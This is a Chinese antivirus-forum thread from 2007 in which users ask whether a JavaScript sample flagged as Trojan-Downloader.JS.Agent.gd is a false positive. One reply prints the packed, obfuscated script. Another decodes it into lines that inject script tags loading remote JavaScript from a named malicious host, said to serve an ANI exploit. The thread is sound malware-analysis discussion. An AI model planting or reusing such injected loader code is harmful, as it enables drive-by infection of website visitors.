查看: 3996|回复: 12
收起左侧

[病毒样本] 只有卡巴和AVG AntiSpyware报

[复制链接]
yzt1004
发表于 2007-5-19 19:49:04 | 显示全部楼层 |阅读模式
除了AVG AntiSpyware和卡巴引擎的都坚决不报
说AVG AntiSpyware垃圾的朋友,证据上门了,AVG AntiSpyware就是喜欢不停地“误报”,是不是??

Ewido        4.0        05.19.2007        Downloader.Agent.gd
F-Secure        6.70.13030.0        05.18.2007        Trojan-Downloader.JS.Agent.gd
Ikarus        T3.1.1.7        05.19.2007        Trojan-Downloader.JS.Agent.gd
Kaspersky        4.0.2.24        05.19.2007        Trojan-Downloader.JS.Agent.gd

[ 本帖最后由 yzt1004 于 2007-5-20 09:44 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
promised
发表于 2007-5-19 19:53:06 | 显示全部楼层
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('A("\\u\\f\\6\\b\\h\\a\\c\\1\\9\\g\\4\\8\\1\\a\\t\\c\\s\\5\\e\\2\\6\\4\\8\\7\\1\\r\\2\\4\\6\\q\\0\\5\\p\\1\\1\\7\\o\\0\\3\\0\\3\\n\\m\\l\\9\\b\\2\\0\\3\\f\\k\\0\\3\\z\\a\\4\\c\\b\\h\\9\\j\\2\\0\\5\\d\\e\\0\\3\\2\\6\\4\\8\\7\\1\\d\\5\\i\\y\\x\\w\\u\\f\\6\\b\\h\\a\\c\\1\\9\\g\\4\\8\\1\\a\\t\\c\\s\\5\\e\\2\\6\\4\\8\\7\\1\\r\\2\\4\\6\\q\\0\\5\\p\\1\\1\\7\\o\\0\\3\\0\\3\\n\\m\\l\\9\\b\\2\\0\\3\\f\\k\\0\\3\\v\\a\\g\\9\\j\\2\\0\\5\\d\\e\\0\\3\\2\\6\\4\\8\\7\\1\\d\\5\\i")',37,37,'134|164|163|57|162|42|143|160|151|56|145|165|156|76|74|157|167|155|51|152|113|141|66|61|72|150|75|40|50|154|144|116|12|15|73|126|eval'.split('|'),0,{}))
不会解密
你这么激动干吗?

[ 本帖最后由 promised 于 2007-5-19 19:56 编辑 ]
gwg829
头像被屏蔽
发表于 2007-5-19 20:03:35 | 显示全部楼层
至于单开一帖这么说卡巴  
tun
发表于 2007-5-19 20:12:34 | 显示全部楼层
这百分百是木马
解=
document.writeln("<script src=\"http:\/\/16a.us\/oK\/Vernum.js\"><\/script>");
document.writeln("<script src=\"http:\/\/16a.us\/oK\/New.js\"><\/script>")
http://16a.us/oK/New.js 挂 Ani-Exploit >> http://16a.us/oK/MyTest2.jpg

New.js - Trojan-Downloader.JS.Agent.gd 他们是一对的吧?

当然单纯看不是木马,只是挂个脚本,Kaspersky Lab 应该检视过整个内容了才决定报他。

[ 本帖最后由 tun 于 2007-5-19 20:14 编辑 ]
柳如斯 该用户已被删除
发表于 2007-5-19 20:27:46 | 显示全部楼层
bridgewr
发表于 2007-5-19 22:23:24 | 显示全部楼层
脚本一个
taihuxian
发表于 2007-5-20 07:09:18 | 显示全部楼层

AVK2007

Website blocked!
G DATA InternetSecurity has denied access to this website.
The site contains infected code: Trojan-Downloader.JS.Agent.gd.
yzt1004
 楼主| 发表于 2007-5-20 09:43:39 | 显示全部楼层
有没有人鉴定一下到底是不是误报啊?
人呢?
chow2006
发表于 2007-5-20 12:43:52 | 显示全部楼层
只有卡巴和AVG AntiSpyware报?

[ 本帖最后由 chow2006 于 2007-5-20 12:45 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
yzt1004
 楼主| 发表于 2007-5-20 12:57:57 | 显示全部楼层

回复 #9 chow2006 的帖子

去Virustotal测试过了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-12 09:37 , Processed in 0.125124 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表